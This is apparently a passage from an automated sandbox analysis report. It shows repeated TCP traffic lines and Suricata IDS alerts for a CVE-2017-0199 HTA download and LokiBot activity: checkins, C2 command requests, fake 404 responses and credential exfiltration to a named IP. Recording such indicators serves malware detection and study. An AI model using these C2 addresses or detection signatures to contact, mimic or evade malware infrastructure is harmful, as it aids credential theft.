                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49167
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80

                    Networking

                    Source: Network traffic | Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: Network traffic | Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49177 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49177 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49177 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49188 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49188 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49182 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49188 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49182 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49187 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49187 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49185 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49182 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49185 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49187 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49185 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49171 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49171 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49171 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49176 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49177 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49182 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49177 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49188 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49182 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49190 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49188 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49171 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49187 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49168 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49190 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49187 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49190 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49168 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49176 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49177
                    Source: Network traffic | Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49190 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49168 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49190 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49187
                    Source: Network traffic | Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49171 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49195 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49195 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49195 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49182
                    Source: Network traffic | Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49188
                    Source: Network traffic | Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.22:49168 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49171
                    Source: Network traffic | Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49195 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49195 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49185 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49185 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49210 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49210 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49210 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49207 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49192 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49186 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49207 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49207 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49195
                    Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49203 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49203 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49190
                    Source: Network traffic | Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49203 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49194 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49192 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49174 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49203 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49203 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49205 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49194 -> 94.156.177.41:80
                    Source: Network traffic | Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49205 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49205 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49194 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49185
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49205 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49214 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49205 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49210 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49213 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49210 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49186 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49186 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49207 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49205
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49192 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49214 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49189 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49189 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49189 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49186 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49199 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49178 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49178 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49202 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49206 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49222 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49227 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49227 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49214 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49227 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49174 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49186 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49174 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49194 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49213 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49176 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49233 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49178 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49233 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49236 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49236 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49236 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49206 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49206 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49198 -> 94.156.177.41:80
                    Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49169 -> 94.156.177.41:80
